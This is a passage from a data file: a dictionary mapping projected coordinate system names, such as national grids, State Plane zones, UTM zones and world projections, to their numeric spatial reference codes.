'TM65_Irish_Grid': 29902, 'TM75_Irish_Grid': 29903, 'Japan_Zone_1': 30161, 'Japan_Zone_2': 30162, 'Japan_Zone_3': 30163, 'Japan_Zone_4': 30164, 'Japan_Zone_5': 30165, 'Japan_Zone_6': 30166, 'Japan_Zone_7': 30167, 'Japan_Zone_8': 30168, 'Japan_Zone_9': 30169, 'Japan_Zone_10': 30170, 'Japan_Zone_11': 30171, 'Japan_Zone_12': 30172, 'Japan_Zone_13': 30173, 'Japan_Zone_14': 30174, 'Japan_Zone_15': 30175, 'Japan_Zone_16': 30176, 'Japan_Zone_17': 30177, 'Japan_Zone_18': 30178, 'Japan_Zone_19': 30179, 'Trinidad_1903_Trinidad_Grid': 30200, 'TC_1948_UTM_Zone_39N': 30339, 'TC_1948_UTM_Zone_40N': 30340, 'Nord_Algerie_Ancienne': 30491, 'Sud_Algerie_Ancienne': 30492, 'Voirol_1879_Nord_Algerie_Ancienne': 30493, 'Voirol_1879_Sud_Algerie_Ancienne': 30494, 'Nord_Algerie': 30591, 'Sud_Algerie': 30592, 'Nord_Sahara_1959_UTM_Zone_29N': 30729, 'Nord_Sahara_1959_UTM_Zone_30N': 30730, 'Nord_Sahara_1959_UTM_Zone_31N': 30731, 'Nord_Sahara_1959_UTM_Zone_32N': 30732, 'Nord_Sahara_1959_Voirol_Unifie_Nord': 30791, 'Nord_Sahara_1959_Voirol_Unifie_Sud': 30792, 'Swedish_National_Grid': 30800, 'Yoff_1972_UTM_Zone_28N': 31028, 'Zanderij_1972_UTM_Zone_21N': 31121, 'Zanderij_TM_54_NW': 31154, 'Zanderij_Suriname_Old_TM': 31170, 'Zanderij_Suriname_TM': 31171, 'MGI_Ferro_Austria_GK_West': 31251, 'MGI_Ferro_Austria_GK_Central': 31252, 'MGI_Ferro_Austria_GK_East': 31253, 'MGI_Austria_GK_West': 31254, 'MGI_Austria_GK_Central': 31255, 'MGI_Austria_GK_East': 31256, 'MGI_Austria_GK_M28': 31257, 'MGI_Austria_GK_M31': 31258, 'MGI_Austria_GK_M34': 31259, 'MGI_3_Degree_Gauss_Zone_5': 31265, 'MGI_3_Degree_Gauss_Zone_6': 31266, 'MGI_3_Degree_Gauss_Zone_7': 31267, 'MGI_3_Degree_Gauss_Zone_8': 31268, 'MGI_Balkans_5': 31275, 'MGI_Balkans_6': 31276, 'MGI_Balkans_7': 31277, 'MGI_Balkans_8': 31278, 'MGI_Balkans_8': 31279, 'Austria_West_Zone': 31281, 'Austria_Central_Zone': 31282, 'Austria_East_Zone': 31283, 'MGI_M28': 31284, 'MGI_M31': 31285, 'MGI_M34': 31286, 'MGI_Austria_Lambert': 31287, 'MGI_Ferro_M28': 31288, 'MGI_Ferro_M31': 31289, 'MGI_Ferro_M34': 31290, 'Austria_West_Zone': 31291, 'Austria_Central_Zone': 31292, 'Austria_East_Zone': 31293, 'MGI_M28': 31294, 'MGI_M31': 31295, 'MGI_M34': 31296, 'MGI_Austria_Lambert': 31297, 'Belge_Lambert_1972': 31370, 'DHDN_3_Degree_Gauss_Zone_1': 31461, 'DHDN_3_Degree_Gauss_Zone_2': 31462, 'DHDN_3_Degree_Gauss_Zone_3': 31463, 'DHDN_3_Degree_Gauss_Zone_4': 31464, 'DHDN_3_Degree_Gauss_Zone_5': 31465, 'DHDN_3_Degree_Gauss_Zone_2': 31466, 'DHDN_3_Degree_Gauss_Zone_3': 31467, 'DHDN_3_Degree_Gauss_Zone_4': 31468, 'DHDN_3_Degree_Gauss_Zone_5': 31469, 'Germany_Zone_1': 31491, 'Germany_Zone_2': 31492, 'Germany_Zone_3': 31493, 'Germany_Zone_4': 31494, 'Germany_Zone_5': 31495, 'Conakry_1905_UTM_Zone_28N': 31528, 'Conakry_1905_UTM_Zone_29N': 31529, 'Stereo_33': 31600, 'Stereo_70': 31700, 'NGN_UTM_Zone_38N': 31838, 'NGN_UTM_Zone_39N': 31839, 'KUDAMS_KTM': 31901, 'SIRGAS_UTM_Zone_17N': 31917, 'SIRGAS_UTM_Zone_18N': 31918, 'SIRGAS_UTM_Zone_19N': 31919, 'SIRGAS_UTM_Zone_20N': 31920, 'SIRGAS_UTM_Zone_21N': 31921, 'SIRGAS_UTM_Zone_22N': 31922, 'SIRGAS_2000_UTM_Zone_17N': 31971, 'SIRGAS_2000_UTM_Zone_18N': 31972, 'SIRGAS_2000_UTM_Zone_19N': 31973, 'SIRGAS_2000_UTM_Zone_20N': 31974, 'SIRGAS_2000_UTM_Zone_21N': 31975, 'SIRGAS_2000_UTM_Zone_22N': 31976, 'SIRGAS_2000_UTM_Zone_17S': 31977, 'SIRGAS_2000_UTM_Zone_18S': 31978, 'SIRGAS_2000_UTM_Zone_19S': 31979, 'SIRGAS_2000_UTM_Zone_20S': 31980, 'SIRGAS_2000_UTM_Zone_21S': 31981, 'SIRGAS_2000_UTM_Zone_22S': 31982, 'SIRGAS_2000_UTM_Zone_23S': 31983, 'SIRGAS_2000_UTM_Zone_24S': 31984, 'SIRGAS_2000_UTM_Zone_25S': 31985, 'SIRGAS_UTM_Zone_17N': 31986, 'SIRGAS_UTM_Zone_18N': 31987, 'SIRGAS_UTM_Zone_19N': 31988, 'SIRGAS_UTM_Zone_20N': 31989, 'SIRGAS_UTM_Zone_21N': 31990, 'SIRGAS_UTM_Zone_22N': 31991, 'SIRGAS_UTM_Zone_17S': 31992, 'SIRGAS_UTM_Zone_18S': 31993, 'SIRGAS_UTM_Zone_19S': 31994, 'SIRGAS_UTM_Zone_20S': 31995, 'SIRGAS_UTM_Zone_21S': 31996, 'SIRGAS_UTM_Zone_22S': 31997, 'SIRGAS_UTM_Zone_23S': 31998, 'SIRGAS_UTM_Zone_24S': 31999, 'SIRGAS_UTM_Zone_25S': 32000, 'NAD_1927_StatePlane_Montana_North_FIPS_2501': 32001, 'NAD_1927_StatePlane_Montana_Central_FIPS_2502': 32002, 'NAD_1927_StatePlane_Montana_South_FIPS_2503': 32003, 'NAD_1927_StatePlane_Nebraska_North_FIPS_2601': 32005, 'NAD_1927_StatePlane_Nebraska_South_FIPS_2602': 32006, 'NAD_1927_StatePlane_Nevada_East_FIPS_2701': 32007, 'NAD_1927_StatePlane_Nevada_Central_FIPS_2702': 32008, 'NAD_1927_StatePlane_Nevada_West_FIPS_2703': 32009, 'NAD_1927_StatePlane_New_Hampshire_FIPS_2800': 32010, 'NAD_1927_StatePlane_New_Jersey_FIPS_2900': 32011, 'NAD_1927_StatePlane_New_Mexico_East_FIPS_3001': 32012, 'NAD_1927_StatePlane_New_Mexico_Central_FIPS_3002': 32013, 'NAD_1927_StatePlane_New_Mexico_West_FIPS_3003': 32014, 'NAD_1927_StatePlane_New_York_East_FIPS_3101': 32015, 'NAD_1927_StatePlane_New_York_Central_FIPS_3102': 32016, 'NAD_1927_StatePlane_New_York_West_FIPS_3103': 32017, 'NAD_1927_StatePlane_New_York_Long_Island_FIPS_3104': 32018, 'NAD_1927_StatePlane_North_Carolina_FIPS_3200': 32019, 'NAD_1927_StatePlane_North_Dakota_North_FIPS_3301': 32020, 'NAD_1927_StatePlane_North_Dakota_South_FIPS_3302': 32021, 'NAD_1927_StatePlane_Ohio_North_FIPS_3401': 32022, 'NAD_1927_StatePlane_Ohio_South_FIPS_3402': 32023, 'NAD_1927_StatePlane_Oklahoma_North_FIPS_3501': 32024, 'NAD_1927_StatePlane_Oklahoma_South_FIPS_3502': 32025, 'NAD_1927_StatePlane_Oregon_North_FIPS_3601': 32026, 'NAD_1927_StatePlane_Oregon_South_FIPS_3602': 32027, 'NAD_1927_StatePlane_Pennsylvania_North_FIPS_3701': 32028, 'NAD_1927_StatePlane_Pennsylvania_South_FIPS_3702': 32029, 'NAD_1927_StatePlane_Rhode_Island_FIPS_3800': 32030, 'NAD_1927_StatePlane_South_Carolina_North_FIPS_3901': 32031, 'NAD_1927_StatePlane_South_Carolina_South_FIPS_3902': 32033, 'NAD_1927_StatePlane_South_Dakota_North_FIPS_4001': 32034, 'NAD_1927_StatePlane_South_Dakota_South_FIPS_4002': 32035, 'NAD_1927_StatePlane_Tennessee_FIPS_4100': 32036, 'NAD_1927_StatePlane_Texas_North_FIPS_4201': 32037, 'NAD_1927_StatePlane_Texas_North_Central_FIPS_4202': 32038, 'NAD_1927_StatePlane_Texas_Central_FIPS_4203': 32039, 'NAD_1927_StatePlane_Texas_South_Central_FIPS_4204': 32040, 'NAD_1927_StatePlane_Texas_South_FIPS_4205': 32041, 'NAD_1927_StatePlane_Utah_North_FIPS_4301': 32042, 'NAD_1927_StatePlane_Utah_Central_FIPS_4302': 32043, 'NAD_1927_StatePlane_Utah_South_FIPS_4303': 32044, 'NAD_1927_StatePlane_Vermont_FIPS_4400': 32045, 'NAD_1927_StatePlane_Virginia_North_FIPS_4501': 32046, 'NAD_1927_StatePlane_Virginia_South_FIPS_4502': 32047, 'NAD_1927_StatePlane_Washington_North_FIPS_4601': 32048, 'NAD_1927_StatePlane_Washington_South_FIPS_4602': 32049, 'NAD_1927_StatePlane_West_Virginia_North_FIPS_4701': 32050, 'NAD_1927_StatePlane_West_Virginia_South_FIPS_4702': 32051, 'NAD_1927_StatePlane_Wisconsin_North_FIPS_4801': 32052, 'NAD_1927_StatePlane_Wisconsin_Central_FIPS_4802': 32053, 'NAD_1927_StatePlane_Wisconsin_South_FIPS_4803': 32054, 'NAD_1927_StatePlane_Wyoming_East_FIPS_4901': 32055, 'NAD_1927_StatePlane_Wyoming_East_Central_FIPS_4902': 32056, 'NAD_1927_StatePlane_Wyoming_West_Central_FIPS_4903': 32057, 'NAD_1927_StatePlane_Wyoming_West_FIPS_4904': 32058, 'NAD_1927_StatePlane_Puerto_Rico_FIPS_5201': 32059, 'NAD_1927_StatePlane_Virgin_Islands_St_Croix_FIPS_5202': 32060, 'NAD_1927_Guatemala_Norte': 32061, 'NAD_1927_Guatemala_Sur': 32062, 'NAD_1927_BLM_Zone_14N': 32064, 'NAD_1927_BLM_Zone_15N': 32065, 'NAD_1927_BLM_Zone_16N': 32066, 'NAD_1927_BLM_Zone_17N': 32067, 'NAD_1927_BLM_Zone_14N': 32074, 'NAD_1927_BLM_Zone_15N': 32075, 'NAD_1927_BLM_Zone_16N': 32076, 'NAD_1927_BLM_Zone_17N': 32077, 'NAD_1927_MTM_1': 32081, 'NAD_1927_MTM_2': 32082, 'NAD_1927_MTM_3': 32083, 'NAD_1927_MTM_4': 32084, 'NAD_1927_MTM_5': 32085, 'NAD_1927_MTM_6': 32086, 'NAD_1927_Quebec_Lambert': 32098, 'NAD_1927_StatePlane_Louisiana_Offshore_FIPS_1703': 32099, 'NAD_1983_StatePlane_Montana_FIPS_2500': 32100, 'NAD_1983_StatePlane_Nebraska_FIPS_2600': 32104, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701': 32107, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702': 32108, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703': 32109, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800': 32110, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900': 32111, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001': 32112, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002': 32113, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003': 32114, 'NAD_1983_StatePlane_New_York_East_FIPS_3101': 32115, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102': 32116, 'NAD_1983_StatePlane_New_York_West_FIPS_3103': 32117, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104': 32118, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200': 32119, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301': 32120, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302': 32121, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401': 32122, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402': 32123, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501': 32124, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502': 32125, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601': 32126, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602': 32127, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701': 32128, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702': 32129, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800': 32130, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900': 32133, 'NAD_1983_StatePlane_South_Dakota_North_FIPS_4001': 32134, 'NAD_1983_StatePlane_South_Dakota_South_FIPS_4002': 32135, 'NAD_1983_StatePlane_Tennessee_FIPS_4100': 32136, 'NAD_1983_StatePlane_Texas_North_FIPS_4201': 32137, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202': 32138, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203': 32139, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204': 32140, 'NAD_1983_StatePlane_Texas_South_FIPS_4205': 32141, 'NAD_1983_StatePlane_Utah_North_FIPS_4301': 32142, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302': 32143, 'NAD_1983_StatePlane_Utah_South_FIPS_4303': 32144, 'NAD_1983_StatePlane_Vermont_FIPS_4400': 32145, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501': 32146, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502': 32147, 'NAD_1983_StatePlane_Washington_North_FIPS_4601': 32148, 'NAD_1983_StatePlane_Washington_South_FIPS_4602': 32149, 'NAD_1983_StatePlane_West_Virginia_North_FIPS_4701': 32150, 'NAD_1983_StatePlane_West_Virginia_South_FIPS_4702': 32151, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801': 32152, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802': 32153, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803': 32154, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901': 32155, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902': 32156, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903': 32157, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904': 32158, 'NAD_1983_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 32161, 'NAD_1983_BLM_Zone_14N_ftUS': 32164, 'NAD_1983_BLM_Zone_15N_ftUS': 32165, 'NAD_1983_BLM_Zone_16N_ftUS': 32166, 'NAD_1983_BLM_Zone_17N_ftUS': 32167, 'NAD_1983_MTM_2_SCoPQ': 32180, 'NAD_1983_MTM_1': 32181, 'NAD_1983_MTM_2': 32182, 'NAD_1983_MTM_3': 32183, 'NAD_1983_MTM_4': 32184, 'NAD_1983_MTM_5': 32185, 'NAD_1983_MTM_6': 32186, 'NAD_1983_MTM_7': 32187, 'NAD_1983_MTM_8': 32188, 'NAD_1983_MTM_9': 32189, 'NAD_1983_MTM_10': 32190, 'NAD_1983_MTM_11': 32191, 'NAD_1983_MTM_12': 32192, 'NAD_1983_MTM_13': 32193, 'NAD_1983_MTM_14': 32194, 'NAD_1983_MTM_15': 32195, 'NAD_1983_MTM_16': 32196, 'NAD_1983_MTM_17': 32197, 'NAD_1983_Quebec_Lambert': 32198, 'NAD_1983_StatePlane_Louisiana_Offshore_FIPS_1703': 32199, 'WGS_1972_UTM_Zone_1N': 32201, 'WGS_1972_UTM_Zone_2N': 32202, 'WGS_1972_UTM_Zone_3N': 32203, 'WGS_1972_UTM_Zone_4N': 32204, 'WGS_1972_UTM_Zone_5N': 32205, 'WGS_1972_UTM_Zone_6N': 32206, 'WGS_1972_UTM_Zone_7N': 32207, 'WGS_1972_UTM_Zone_8N': 32208, 'WGS_1972_UTM_Zone_9N': 32209, 'WGS_1972_UTM_Zone_10N': 32210, 'WGS_1972_UTM_Zone_11N': 32211, 'WGS_1972_UTM_Zone_12N': 32212, 'WGS_1972_UTM_Zone_13N': 32213, 'WGS_1972_UTM_Zone_14N': 32214, 'WGS_1972_UTM_Zone_15N': 32215, 'WGS_1972_UTM_Zone_16N': 32216, 'WGS_1972_UTM_Zone_17N': 32217, 'WGS_1972_UTM_Zone_18N': 32218, 'WGS_1972_UTM_Zone_19N': 32219, 'WGS_1972_UTM_Zone_20N': 32220, 'WGS_1972_UTM_Zone_21N': 32221, 'WGS_1972_UTM_Zone_22N': 32222, 'WGS_1972_UTM_Zone_23N': 32223, 'WGS_1972_UTM_Zone_24N': 32224, 'WGS_1972_UTM_Zone_25N': 32225, 'WGS_1972_UTM_Zone_26N': 32226, 'WGS_1972_UTM_Zone_27N': 32227, 'WGS_1972_UTM_Zone_28N': 32228, 'WGS_1972_UTM_Zone_29N': 32229, 'WGS_1972_UTM_Zone_30N': 32230, 'WGS_1972_UTM_Zone_31N': 32231, 'WGS_1972_UTM_Zone_32N': 32232, 'WGS_1972_UTM_Zone_33N': 32233, 'WGS_1972_UTM_Zone_34N': 32234, 'WGS_1972_UTM_Zone_35N': 32235, 'WGS_1972_UTM_Zone_36N': 32236, 'WGS_1972_UTM_Zone_37N': 32237, 'WGS_1972_UTM_Zone_38N': 32238, 'WGS_1972_UTM_Zone_39N': 32239, 'WGS_1972_UTM_Zone_40N': 32240, 'WGS_1972_UTM_Zone_41N': 32241, 'WGS_1972_UTM_Zone_42N': 32242, 'WGS_1972_UTM_Zone_43N': 32243, 'WGS_1972_UTM_Zone_44N': 32244, 'WGS_1972_UTM_Zone_45N': 32245, 'WGS_1972_UTM_Zone_46N': 32246, 'WGS_1972_UTM_Zone_47N': 32247, 'WGS_1972_UTM_Zone_48N': 32248, 'WGS_1972_UTM_Zone_49N': 32249, 'WGS_1972_UTM_Zone_50N': 32250, 'WGS_1972_UTM_Zone_51N': 32251, 'WGS_1972_UTM_Zone_52N': 32252, 'WGS_1972_UTM_Zone_53N': 32253, 'WGS_1972_UTM_Zone_54N': 32254, 'WGS_1972_UTM_Zone_55N': 32255, 'WGS_1972_UTM_Zone_56N': 32256, 'WGS_1972_UTM_Zone_57N': 32257, 'WGS_1972_UTM_Zone_58N': 32258, 'WGS_1972_UTM_Zone_59N': 32259, 'WGS_1972_UTM_Zone_60N': 32260, 'WGS_1972_UTM_Zone_1S': 32301, 'WGS_1972_UTM_Zone_2S': 32302, 'WGS_1972_UTM_Zone_3S': 32303, 'WGS_1972_UTM_Zone_4S': 32304, 'WGS_1972_UTM_Zone_5S': 32305, 'WGS_1972_UTM_Zone_6S': 32306, 'WGS_1972_UTM_Zone_7S': 32307, 'WGS_1972_UTM_Zone_8S': 32308, 'WGS_1972_UTM_Zone_9S': 32309, 'WGS_1972_UTM_Zone_10S': 32310, 'WGS_1972_UTM_Zone_11S': 32311, 'WGS_1972_UTM_Zone_12S': 32312, 'WGS_1972_UTM_Zone_13S': 32313, 'WGS_1972_UTM_Zone_14S': 32314, 'WGS_1972_UTM_Zone_15S': 32315, 'WGS_1972_UTM_Zone_16S': 32316, 'WGS_1972_UTM_Zone_17S': 32317, 'WGS_1972_UTM_Zone_18S': 32318, 'WGS_1972_UTM_Zone_19S': 32319, 'WGS_1972_UTM_Zone_20S': 32320, 'WGS_1972_UTM_Zone_21S': 32321, 'WGS_1972_UTM_Zone_22S': 32322, 'WGS_1972_UTM_Zone_23S': 32323, 'WGS_1972_UTM_Zone_24S': 32324, 'WGS_1972_UTM_Zone_25S': 32325, 'WGS_1972_UTM_Zone_26S': 32326, 'WGS_1972_UTM_Zone_27S': 32327, 'WGS_1972_UTM_Zone_28S': 32328, 'WGS_1972_UTM_Zone_29S': 32329, 'WGS_1972_UTM_Zone_30S': 32330, 'WGS_1972_UTM_Zone_31S': 32331, 'WGS_1972_UTM_Zone_32S': 32332, 'WGS_1972_UTM_Zone_33S': 32333, 'WGS_1972_UTM_Zone_34S': 32334, 'WGS_1972_UTM_Zone_35S': 32335, 'WGS_1972_UTM_Zone_36S': 32336, 'WGS_1972_UTM_Zone_37S': 32337, 'WGS_1972_UTM_Zone_38S': 32338, 'WGS_1972_UTM_Zone_39S': 32339, 'WGS_1972_UTM_Zone_40S': 32340, 'WGS_1972_UTM_Zone_41S': 32341, 'WGS_1972_UTM_Zone_42S': 32342, 'WGS_1972_UTM_Zone_43S': 32343, 'WGS_1972_UTM_Zone_44S': 32344, 'WGS_1972_UTM_Zone_45S': 32345, 'WGS_1972_UTM_Zone_46S': 32346, 'WGS_1972_UTM_Zone_47S': 32347, 'WGS_1972_UTM_Zone_48S': 32348, 'WGS_1972_UTM_Zone_49S': 32349, 'WGS_1972_UTM_Zone_50S': 32350, 'WGS_1972_UTM_Zone_51S': 32351, 'WGS_1972_UTM_Zone_52S': 32352, 'WGS_1972_UTM_Zone_53S': 32353, 'WGS_1972_UTM_Zone_54S': 32354, 'WGS_1972_UTM_Zone_55S': 32355, 'WGS_1972_UTM_Zone_56S': 32356, 'WGS_1972_UTM_Zone_57S': 32357, 'WGS_1972_UTM_Zone_58S': 32358, 'WGS_1972_UTM_Zone_59S': 32359, 'WGS_1972_UTM_Zone_60S': 32360, 'WGS_1984_UTM_Zone_1N': 32601, 'WGS_1984_UTM_Zone_2N': 32602, 'WGS_1984_UTM_Zone_3N': 32603, 'WGS_1984_UTM_Zone_4N': 32604, 'WGS_1984_UTM_Zone_5N': 32605, 'WGS_1984_UTM_Zone_6N': 32606, 'WGS_1984_UTM_Zone_7N': 32607, 'WGS_1984_UTM_Zone_8N': 32608, 'WGS_1984_UTM_Zone_9N': 32609, 'WGS_1984_UTM_Zone_10N': 32610, 'WGS_1984_UTM_Zone_11N': 32611, 'WGS_1984_UTM_Zone_12N': 32612, 'WGS_1984_UTM_Zone_13N': 32613, 'WGS_1984_UTM_Zone_14N': 32614, 'WGS_1984_UTM_Zone_15N': 32615, 'WGS_1984_UTM_Zone_16N': 32616, 'WGS_1984_UTM_Zone_17N': 32617, 'WGS_1984_UTM_Zone_18N': 32618, 'WGS_1984_UTM_Zone_19N': 32619, 'WGS_1984_UTM_Zone_20N': 32620, 'WGS_1984_UTM_Zone_21N': 32621, 'WGS_1984_UTM_Zone_22N': 32622, 'WGS_1984_UTM_Zone_23N': 32623, 'WGS_1984_UTM_Zone_24N': 32624, 'WGS_1984_UTM_Zone_25N': 32625, 'WGS_1984_UTM_Zone_26N': 32626, 'WGS_1984_UTM_Zone_27N': 32627, 'WGS_1984_UTM_Zone_28N': 32628, 'WGS_1984_UTM_Zone_29N': 32629, 'WGS_1984_UTM_Zone_30N': 32630, 'WGS_1984_UTM_Zone_31N': 32631, 'WGS_1984_UTM_Zone_32N': 32632, 'WGS_1984_UTM_Zone_33N': 32633, 'WGS_1984_UTM_Zone_34N': 32634, 'WGS_1984_UTM_Zone_35N': 32635, 'WGS_1984_UTM_Zone_36N': 32636, 'WGS_1984_UTM_Zone_37N': 32637, 'WGS_1984_UTM_Zone_38N': 32638, 'WGS_1984_UTM_Zone_39N': 32639, 'WGS_1984_UTM_Zone_40N': 32640, 'WGS_1984_UTM_Zone_41N': 32641, 'WGS_1984_UTM_Zone_42N': 32642, 'WGS_1984_UTM_Zone_43N': 32643, 'WGS_1984_UTM_Zone_44N': 32644, 'WGS_1984_UTM_Zone_45N': 32645, 'WGS_1984_UTM_Zone_46N': 32646, 'WGS_1984_UTM_Zone_47N': 32647, 'WGS_1984_UTM_Zone_48N': 32648, 'WGS_1984_UTM_Zone_49N': 32649, 'WGS_1984_UTM_Zone_50N': 32650, 'WGS_1984_UTM_Zone_51N': 32651, 'WGS_1984_UTM_Zone_52N': 32652, 'WGS_1984_UTM_Zone_53N': 32653, 'WGS_1984_UTM_Zone_54N': 32654, 'WGS_1984_UTM_Zone_55N': 32655, 'WGS_1984_UTM_Zone_56N': 32656, 'WGS_1984_UTM_Zone_57N': 32657, 'WGS_1984_UTM_Zone_58N': 32658, 'WGS_1984_UTM_Zone_59N': 32659, 'WGS_1984_UTM_Zone_60N': 32660, 'UPS_North': 32661, 'WGS_1984_Plate_Carree': 32662, 'WGS_1984_BLM_Zone_14N_ftUS': 32664, 'WGS_1984_BLM_Zone_15N_ftUS': 32665, 'WGS_1984_BLM_Zone_16N_ftUS': 32666, 'WGS_1984_BLM_Zone_17N_ftUS': 32667, 'WGS_1984_UTM_Zone_1S': 32701, 'WGS_1984_UTM_Zone_2S': 32702, 'WGS_1984_UTM_Zone_3S': 32703, 'WGS_1984_UTM_Zone_4S': 32704, 'WGS_1984_UTM_Zone_5S': 32705, 'WGS_1984_UTM_Zone_6S': 32706, 'WGS_1984_UTM_Zone_7S': 32707, 'WGS_1984_UTM_Zone_8S': 32708, 'WGS_1984_UTM_Zone_9S': 32709, 'WGS_1984_UTM_Zone_10S': 32710, 'WGS_1984_UTM_Zone_11S': 32711, 'WGS_1984_UTM_Zone_12S': 32712, 'WGS_1984_UTM_Zone_13S': 32713, 'WGS_1984_UTM_Zone_14S': 32714, 'WGS_1984_UTM_Zone_15S': 32715, 'WGS_1984_UTM_Zone_16S': 32716, 'WGS_1984_UTM_Zone_17S': 32717, 'WGS_1984_UTM_Zone_18S': 32718, 'WGS_1984_UTM_Zone_19S': 32719, 'WGS_1984_UTM_Zone_20S': 32720, 'WGS_1984_UTM_Zone_21S': 32721, 'WGS_1984_UTM_Zone_22S': 32722, 'WGS_1984_UTM_Zone_23S': 32723, 'WGS_1984_UTM_Zone_24S': 32724, 'WGS_1984_UTM_Zone_25S': 32725, 'WGS_1984_UTM_Zone_26S': 32726, 'WGS_1984_UTM_Zone_27S': 32727, 'WGS_1984_UTM_Zone_28S': 32728, 'WGS_1984_UTM_Zone_29S': 32729, 'WGS_1984_UTM_Zone_30S': 32730, 'WGS_1984_UTM_Zone_31S': 32731, 'WGS_1984_UTM_Zone_32S': 32732, 'WGS_1984_UTM_Zone_33S': 32733, 'WGS_1984_UTM_Zone_34S': 32734, 'WGS_1984_UTM_Zone_35S': 32735, 'WGS_1984_UTM_Zone_36S': 32736, 'WGS_1984_UTM_Zone_37S': 32737, 'WGS_1984_UTM_Zone_38S': 32738, 'WGS_1984_UTM_Zone_39S': 32739, 'WGS_1984_UTM_Zone_40S': 32740, 'WGS_1984_UTM_Zone_41S': 32741, 'WGS_1984_UTM_Zone_42S': 32742, 'WGS_1984_UTM_Zone_43S': 32743, 'WGS_1984_UTM_Zone_44S': 32744, 'WGS_1984_UTM_Zone_45S': 32745, 'WGS_1984_UTM_Zone_46S': 32746, 'WGS_1984_UTM_Zone_47S': 32747, 'WGS_1984_UTM_Zone_48S': 32748, 'WGS_1984_UTM_Zone_49S': 32749, 'WGS_1984_UTM_Zone_50S': 32750, 'WGS_1984_UTM_Zone_51S': 32751, 'WGS_1984_UTM_Zone_52S': 32752, 'WGS_1984_UTM_Zone_53S': 32753, 'WGS_1984_UTM_Zone_54S': 32754, 'WGS_1984_UTM_Zone_55S': 32755, 'WGS_1984_UTM_Zone_56S': 32756, 'WGS_1984_UTM_Zone_57S': 32757, 'WGS_1984_UTM_Zone_58S': 32758, 'WGS_1984_UTM_Zone_59S': 32759, 'WGS_1984_UTM_Zone_60S': 32760, 'UPS_South': 32761, 'WGS_1984_TM_36_SE': 32766, 'Sphere_Plate_Carree': 53001, 'Sphere_Equidistant_Cylindrical': 53002, 'Sphere_Miller_Cylindrical': 53003, 'Sphere_Mercator': 53004, 'Sphere_Sinusoidal': 53008, 'Sphere_Mollweide': 53009, 'Sphere_Eckert_VI': 53010, 'Sphere_Eckert_V': 53011, 'Sphere_Eckert_IV': 53012, 'Sphere_Eckert_III': 53013, 'Sphere_Eckert_II': 53014, 'Sphere_Eckert_I': 53015, 'Sphere_Gall_Stereographic': 53016, 'Sphere_Behrmann': 53017, 'Sphere_Winkel_I': 53018, 'Sphere_Winkel_II': 53019, 'Sphere_Polyconic': 53021, 'Sphere_Quartic_Authalic': 53022, 'Sphere_Loximuthal': 53023, 'Sphere_Bonne': 53024, 'Sphere_Hotine': 53025, 'Sphere_Stereographic': 53026, 'Sphere_Equidistant_Conic': 53027, 'Sphere_Cassini': 53028, 'Sphere_Van_der_Grinten_I': 53029, 'Sphere_Robinson': 53030, 'Sphere_Two_Point_Equidistant': 53031, 'Sphere_Azimuthal_Equidistant': 53032, 'Sphere_Cylindrical_Equal_Area': 53034, 'Sphere_Winkel_Tripel_NGS': 53042, 'Sphere_Aitoff': 53043, 'Sphere_Hammer_Aitoff': 53044, 'Sphere_Flat_Polar_Quartic': 53045, 'Sphere_Craster_Parabolic': 53046, 'Sphere_Times': 53048, 'Sphere_Vertical_Perspective': 53049, 'World_Plate_Carree': 54001, 'World_Equidistant_Cylindrical': 54002, 'World_Miller_Cylindrical': 54003, 'World_Mercator': 54004, 'World_Sinusoidal': 54008, 'World_Mollweide': 54009, 'World_Eckert_VI': 54010, 'World_Eckert_V': 54011, 'World_Eckert_IV': 54012, 'World_Eckert_III': 54013, 'World_Eckert_II': 54014, 'World_Eckert_I': 54015, 'World_Gall_Stereographic': 54016, 'World_Behrmann': 54017, 'World_Winkel_I': 54018, 'World_Winkel_II': 54019, 'World_Polyconic': 54021, 'World_Quartic_Authalic': 54022, 'World_Loximuthal': 54023, 'World_Bonne': 54024, 'World_Hotine': 54025, 'World_Stereographic': 54026, 'World_Equidistant_Conic': 54027, 'World_Cassini': 54028, 'World_Van_der_Grinten_I': 54029, 'World_Robinson': 54030, 'World_Two_Point_Equidistant': 54031, 'World_Azimuthal_Equidistant': 54032, 'World_Cylindrical_Equal_Area': 54034, 'World_Winkel_Tripel_NGS': 54042, 'World_Aitoff': 54043, 'World_Hammer_Aitoff': 54044, 'World_Flat_Polar_Quartic': 54045, 'World_Craster_Parabolic': 54046, 'World_Times': 54048, 'World_Vertical_Perspective': 54049, 'World_Fuller': 54050, 'World_Cube': 54051, 'World_Goode_Homolosine_Land': 54052, 